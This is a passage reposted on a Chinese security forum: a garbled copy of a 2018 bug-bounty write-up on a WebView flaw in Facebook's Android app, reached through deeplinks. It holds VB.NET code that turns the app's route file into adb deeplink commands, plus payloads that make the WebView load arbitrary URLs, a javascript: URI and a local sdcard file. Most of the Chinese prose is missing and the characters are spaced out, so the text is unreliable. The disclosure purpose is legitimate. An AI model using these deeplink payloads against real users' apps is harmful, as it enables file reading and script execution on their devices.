搜索

[13275] 2018-10-07_看我如何发现Facebook安卓APP的$8500美金Webview漏洞

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2018-10-07_看我如何发现Facebook安卓APP的$8500美金Webview漏洞 F a c e b o o k A P P $ 8 5 0 0 W e b v i e w c l o u d s   F r e e B u f   2 0 1 8 - 1 0 - 0 7 2 0 1 8 6 F a c e b o o k F a c e b o o k A P P W e b v i e w F a c e b o o k A P P 使   J a v a s c r i p t   3 W e b v i e w F a c e b o o k F a c e b o o k $ 8 5 0 0 F a c e b o o k A P P 西 A P P d e e p l i n k d e e p l i n k A P P f b : / / p r o f i l e / 1 3 9 5 6 3 4 9 0 5 A P P F a c e b o o k A P P A P K W i n R A R F a c e b o o k A P P   f b : / /     a s s e t s / B u n d l e - f b 4 . j s . h b c d e e p l i n k f b : / / m a r k e t p l a c e _ p r o d u c t _ d e t a i l s _ f r o m _ f o r _ s a l e _ i t e m _ i d f b : / / a d s m a n a g e r
  f b : / / a m a /   d e e p l i n k 线 W i n R A R A P K -     r e a c t _ n a t i v e _ r o u t e s . j s o n F a c e b o o k   A P P d e e p l i n k F a c e b o o k   d e e p l i n k f b : / / a m a / ? e n t r y P o i n t = { S T R I N G } & f b _ h i d e s T a b B a r = { S T R I N G } & p r e s e n t a t i o n M e t h o d = { S T R I N G } & t a r g e t U R I = { S T R I N G } r e a c t _ n a t i v e _ r o u t e s . j s o n   1 2 0 0 0 d e e p l i n k J S O N J S O N
V B . N E T J S O N p a t h R o u t e T a b l e P a r a m t e r T a b l e R o u t e # M o v i n g   J S O N   i n t o   a   d a t a b a s e   s t r u c t u r e I m p o r t s   S y s t e m . D a t a . S Q L i t e I m p o r t s   S y s t e m . I O I m p o r t s   N e w t o n s o f t . J s o n . L i n q M o d u l e   M o d u l e 1         S u b   M a i n ( a r g s ( )   A s   S t r i n g )                 P r o c e s s F i l e ( " r e a c t _ n a t i v e _ r o u t e s . j s o n " )         E n d   S u b         P u b l i c   S u b   P r o c e s s F i l e ( I n p u t F i l e   A s   S t r i n g )                 D i m   J S O N T e x t   =   F i l e . R e a d A l l T e x t ( I n p u t F i l e )                 I f   J S O N T e x t . S t a r t s W i t h ( " [ " )   T h e n                         ' M a k e   v a l i d   J S O N                         J S O N T e x t   =   " { ' r e s u l t s '   :   "   &   J S O N T e x t   &   "   } "                 E n d   I f                 D i m   j s o n   A s   J O b j e c t   =   J O b j e c t . P a r s e ( J S O N T e x t )                 D i m   a r r   A s   J A r r a y   =   j s o n . S e l e c t T o k e n ( " r e s u l t s " )                 F o r   i   =   0   T o   a r r . C o u n t   -   1                         T r y                                 D i m   R o u t e N a m e   A s   S t r i n g   =   a r r ( i ) . S e l e c t T o k e n ( " n a m e " )                                 D i m   R o u t e P a t h   A s   S t r i n g   =   a r r ( i ) . S e l e c t T o k e n ( " p a t h " )                                 D i m   p a r a m J S O N   A s   J O b j e c t   =   a r r ( i ) . S e l e c t T o k e n ( " p a r a m D e f i n i t i o n s " )                                 D i m   R o u t e P a r a m a t e C o u n t   A s   I n t e g e r   =   a r r ( i ) . S e l e c t T o k e n ( " p a r a m D e f i n i t i o n s " ) . C o u n t                                 I f   R o u t e P a r a m a t e C o u n t   < >   0   T h e n                                         D i m   o   A s   I n t e g e r   =   0                                         D i m   R o u t e I D   A s   I n t e g e r   =   i n s e r t R o u t e ( R o u t e N a m e ,   R o u t e P a t h ,   R o u t e P a r a m a t e C o u n t )                                         F o r   E a c h   i t e m   A s   J P r o p e r t y   I n   a r r ( i ) . S e l e c t T o k e n ( " p a r a m D e f i n i t i o n s " )                                                 o   + =   1                                                 D i m   P a r a m N a m e   =   i t e m . N a m e                                                 D i m   P a r a m T y p e   =   i t e m . V a l u e ( " t y p e " ) . T o S t r i n g                                                 D i m   P a r a m R e q u i r e d   =   i t e m . V a l u e ( " r e q u i r e d " ) . T o S t r i n g                                                 i n s e r t P a r a m a t e r ( P a r a m N a m e ,   P a r a m T y p e ,   P a r a m R e q u i r e d ,   o ,   R o u t e I D )                                         N e x t                                 E n d   I f                         C a t c h   e x   A s   E x c e p t i o n                         E n d   T r y                 N e x t         E n d   S u b         P u b l i c   F u n c t i o n   i n s e r t R o u t e ( R o u t e N a m e   A s   S t r i n g ,   R o u t e P a t h   A s   S t r i n g ,                                                                 R o u t e P a r a m a t e r C o u n t   A s   I n t e g e r )   A s   I n t e g e r                 D i m   c o n   A s   N e w   S Q L i t e C o n n e c t i o n ( " D a t a   S o u r c e = F B N a t i v e R o u t e s . d b " )                 c o n . O p e n ( )                 D i m   s q l   A s   S t r i n g   =   " I N S E R T   I N T O   R o u t e T a b l e                                                         ( R o u t e N a m e ,   R o u t e P a t h ,   R o u t e P a r a m a t e r C o u n t ,   R o u t e A d d e d D a t e T i m e )                                                             V A L U E S                                                         ( @ R N ,   @ R P ,   @ R P C ,   @ R A D ) "                 D i m   c m d   A s   N e w   S Q L i t e C o m m a n d ( s q l ,   c o n )                 c m d . P a r a m e t e r s . A d d ( " R N " ,   S q l D b T y p e . V a r C h a r ) . V a l u e   =   R o u t e N a m e                 c m d . P a r a m e t e r s . A d d ( " R P " ,   S q l D b T y p e . V a r C h a r ) . V a l u e   =   R o u t e P a t h                 c m d . P a r a m e t e r s . A d d ( " R P C " ,   S q l D b T y p e . I n t ) . V a l u e   =   R o u t e P a r a m a t e r C o u n t                 c m d . P a r a m e t e r s . A d d ( " R A D " ,   S q l D b T y p e . I n t ) . V a l u e   =   D a t e . N o w . T i c k s                 c m d . E x e c u t e N o n Q u e r y ( )                 s q l   =   " S E L E C T   l a s t _ i n s e r t _ r o w i d ( ) "                 c m d   =   N e w   S Q L i t e C o m m a n d ( s q l ,   c o n )                 i n s e r t R o u t e   =   c m d . E x e c u t e S c a l a r ( )                 c o n . C l o s e ( )         E n d   F u n c t i o n         P u b l i c   S u b   i n s e r t P a r a m a t e r ( P a r a m a t e r N a m e   A s   S t r i n g ,   P a r a m a t e r T y p e   A s   S t r i n g ,   P a r a m a t e r R e q u i r e d   A s   B o o l e a n ,                                                             P a r a m a t e r O r d e r I n d e x   A s   I n t e g e r ,   R o u t e I D   A s   I n t e g e r )                 D i m   P R   A s   I n t e g e r   =   0                 I f   P a r a m a t e r R e q u i r e d   =   T r u e   T h e n                         P R   =   1                 E l s e                         P R   =   0                 E n d   I f                 D i m   c o n   A s   N e w   S Q L i t e C o n n e c t i o n ( " D a t a   S o u r c e = F B N a t i v e R o u t e s . d b " )                 c o n . O p e n ( )                 D i m   s q l   A s   S t r i n g   =   " I N S E R T   I N T O   P a r a m a t e r T a b l e                                                         ( P a r a m a t e r N a m e ,   P a r a m a t e r T y p e ,   P a r a m a t e r R e q u i r e d ,   P a r a m a t e r O r d e r I n d e x ,   R o u t e s I D )                                                             V A L U E S                                                         ( @ P N ,   @ P T ,   @ P R ,   @ P O I ,   @ R I D ) "                 D i m   c m d   A s   N e w   S Q L i t e C o m m a n d ( s q l ,   c o n )                 c m d . P a r a m e t e r s . A d d ( " P N " ,   S q l D b T y p e . V a r C h a r ) . V a l u e   =   P a r a m a t e r N a m e                 c m d . P a r a m e t e r s . A d d ( " P T " ,   S q l D b T y p e . V a r C h a r ) . V a l u e   =   P a r a m a t e r T y p e                 c m d . P a r a m e t e r s . A d d ( " P R " ,   S q l D b T y p e . I n t ) . V a l u e   =   P a r a m a t e r R e q u i r e d                 c m d . P a r a m e t e r s . A d d ( " P O I " ,   S q l D b T y p e . I n t ) . V a l u e   =   P R                 c m d . P a r a m e t e r s . A d d ( " R I D " ,   S q l D b T y p e . I n t ) . V a l u e   =   R o u t e I D                 c m d . E x e c u t e N o n Q u e r y ( )                 c o n . C l o s e ( )         E n d   S u b E n d   M o d u l e
S Q L l i t e A D B A P P d e e p l i n k   a m a   d e e p l i n k a d b   s h e l l   a m   s t a r t   - a   a n d r o i d . i n t e n t . a c t i o n . V I E W   - d   f b : / / a m a / ? e n t r y P o i n t = { S T R I N G } & f b _ h i d e s T a b B a r = { S T R I N G } & p r e s e n t a t i o n M e t h o d = { S T R I N G } & t a r g e t U R I = { S T R I N G }   f b : / /   u r l   d e e p l i n k d e e p l i n k # B u i l d i n g   A D B   c o m m a n d s   r e a d y   f o r   b r e a k i n g I m p o r t s   S y s t e m . D a t a . S Q L i t e I m p o r t s   S y s t e m . I O M o d u l e   M o d u l e 1     S u b   M a i n ( a r g s ( )   A s   S t r i n g )             D i m   F i l e P a t h   A s   S t r i n g   =   D a t e . N o w . T o S t r i n g ( " d d M M y y H H m m " )   &   " . t x t "             D i m   F B L i n k   A s   S t r i n g   =   " "             D i m   c o n   A s   N e w   S Q L i t e C o n n e c t i o n ( " D a t a   S o u r c e = F B N a t i v e R o u t e s . d b " )             c o n . O p e n ( )             D i m   s q l   A s   S t r i n g   =   " S E L E C T   R o u t e I D ,   R o u t e N a m e ,   R o u t e P a t h   F R O M   R o u t e T a b l e "             D i m   c m d   A s   N e w   S Q L i t e C o m m a n d ( s q l ,   c o n )             D i m   r e a d e r   A s   S Q L i t e D a t a R e a d e r   =   c m d . E x e c u t e R e a d e r ( )             I f   r e a d e r . H a s R o w s   T h e n                     U s i n g   s w   A s   S t r e a m W r i t e r   =   N e w   S t r e a m W r i t e r ( F i l e P a t h )                             W h i l e   r e a d e r . R e a d                                     F B L i n k   =   B u i l d L i n k ( r e a d e r ( " R o u t e I D " ) ,   r e a d e r ( " R o u t e N a m e " ) ,   r e a d e r ( " R o u t e P a t h " ) )                                     F B L i n k   =   " a d b   s h e l l   a m   s t a r t   - a   " " a n d r o i d . i n t e n t . a c t i o n . V I E W " "   - d   " " "   &   F B L i n k   &   " " " "                                     s w . W r i t e L i n e ( F B L i n k )                             E n d   W h i l e                     E n d   U s i n g             E n d   I f             r e a d e r . C l o s e ( )             c o n . C l o s e ( )     E n d   S u b     P u b l i c   F u n c t i o n   B u i l d L i n k ( R o u t e I D   A s   I n t e g e r ,   R o u t e N a m e   A s   S t r i n g ,   R o u t e P a t h   A s   S t r i n g )   A s   S t r i n g             B u i l d L i n k   =   $ " f b : / { R o u t e P a t h } / "             D i m   i   A s   I n t e g e r   =   0             D i m   c o n   A s   N e w   S Q L i t e C o n n e c t i o n ( " D a t a   S o u r c e = F B N a t i v e R o u t e s . d b " )             c o n . O p e n ( )             D i m   s q l   A s   S t r i n g   =   " S E L E C T   P a r a m a t e r N a m e ,   P a r a m a t e r T y p e ,   P a r a m a t e r R e q u i r e d   F R O M   P a r a m a t e r T a b l e                                                     W H E R E   R o u t e s I D   =   @ R I D "             D i m   c m d   A s   N e w   S Q L i t e C o m m a n d ( s q l ,   c o n )             c m d . P a r a m e t e r s . A d d ( " R I D " ,   S q l D b T y p e . I n t ) . V a l u e   =   R o u t e I D             D i m   r e a d e r   A s   S Q L i t e D a t a R e a d e r   =   c m d . E x e c u t e R e a d e r ( )             I f   r e a d e r . H a s R o w s   T h e n                     W h i l e   r e a d e r . R e a d ( )                             I f   i   =   0   T h e n                                     B u i l d L i n k   & =   " ? "   &   r e a d e r ( " P a r a m a t e r N a m e " )   &   " = "   &   g e t V a l i d V a l u e ( r e a d e r ( " P a r a m a t e r T y p e " ) )                             E l s e                                     B u i l d L i n k   & =   " & "   &   r e a d e r ( " P a r a m a t e r N a m e " )   &   " = "   &   g e t V a l i d V a l u e ( r e a d e r ( " P a r a m a t e r T y p e " ) )                             E n d   I f                             i   + =   1                     E n d   W h i l e             E n d   I f             r e a d e r . C l o s e ( )             c o n . C l o s e ( )     E n d   F u n c t i o n     P u b l i c   F u n c t i o n   g e t V a l i d V a l u e ( P a r a m a t e r T y p e   A s   S t r i n g )   A s   S t r i n g             S e l e c t   C a s e   P a r a m a t e r T y p e                     C a s e   " S t r i n g "                             R e t u r n   " { S T R I N G } "                     C a s e   " I n t "                             R e t u r n   " { I N T } "                     C a s e   " B o o l e a n "                             R e t u r n   " { B O O L E A N } "                     C a s e   E l s e                             R e t u r n   " { S T R I N G } "             E n d   S e l e c t     E n d   F u n c t i o n E n d   M o d u l e
  -   3 6 4 d e e p l i n k a d b   s h e l l   a m   s t a r t   - a   a n d r o i d . i n t e n t . a c t i o n . V I E W   - d   f b : / / p a y m e n t s _ a d d _ p a y p a l / ? u r l = { S T R I N G } a d b   s h e l l   a m   s t a r t   - a   a n d r o i d . i n t e n t . a c t i o n . V I E W   - d f b : / / i g _ l w i c r e a t e _ i n s t a g r a m _ a c c o u n t _ f u l l _ s c r e e n _ a d _ p r e v i e w / ? a d P r e v i e w U r l = { S T R I N G } a d b   s h e l l   a m   s t a r t   - a   a n d r o i d . i n t e n t . a c t i o n . V I E W   - d   f b : / / a d s _ p a y m e n t s _ p r e p a y _ w e b v i e w / ? a c c o u n t = { S T R I N G } & c o n t e x t I D = { S T R I N G } & p a y m e n t I D = { S T R I N G } & u r l = { S T R I N G } & o r i g i n R o o t T a g = { I N T E G E R } d e e p l i n k u r l   u r l = { S T R I N G } u r l h t t p s : / / g o o g l e . c o m P a y l o a d a d b   s h e l l   a m   s t a r t   - a   a n d r o i d . i n t e n t . a c t i o n . V I E W   - d f b : / / i g _ l w i c r e a t e _ i n s t a g r a m _ a c c o u n t _ f u l l _ s c r e e n _ a d _ p r e v i e w / ? a d P r e v i e w U r l = h t t p s : / / g o o g l e . c o m
F a c e b o o k   S S R F F a c e b o o k $ 5 0 0
  -   j a v s c r i p t   U R I   P a y l o a d a d b   s h e l l   a m   s t a r t   - a   a n d r o i d . i n t e n t . a c t i o n . V I E W   - d f b : / / i g _ l w i c r e a t e _ i n s t a g r a m _ a c c o u n t _ f u l l _ s c r e e n _ a d _ p r e v i e w / ? a d P r e v i e w U r l = j a v a s c r i p t : c o n f i r m ( h t t p s : / / f a c e b o o k . c o m / A s h l e y . K i n g . U K ) a d b   s h e l l   a m   s t a r t   - a   a n d r o i d . i n t e n t . a c t i o n . V I E W   - d f b : / / i g _ l w i c r e a t e _ i n s t a g r a m _ a c c o u n t _ f u l l _ s c r e e n _ a d _ p r e v i e w / ? a d P r e v i e w U r l = f i l e : / / / s d c a r d / C D A I n f o . t x t P a y l o a d F a c e b o o k b u g F a c e b o o k F a c e b o o k $ 8 0 0 0 F a c e b o o k U I 访 W e b V i e w W e b V i e w b u g F a c e b o o k H T M L 5   A P I b u g
2 0 1 8 . 3 . 3 0     F a c e b o o k 2 0 1 8 . 4 . 4         F a c e b o o k 2 0 1 8 . 4 . 1 3       F a c e b o o k 2 0 1 8 . 5 . 1 6       F a c e b o o k * a s h k i n g c l o u d s F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理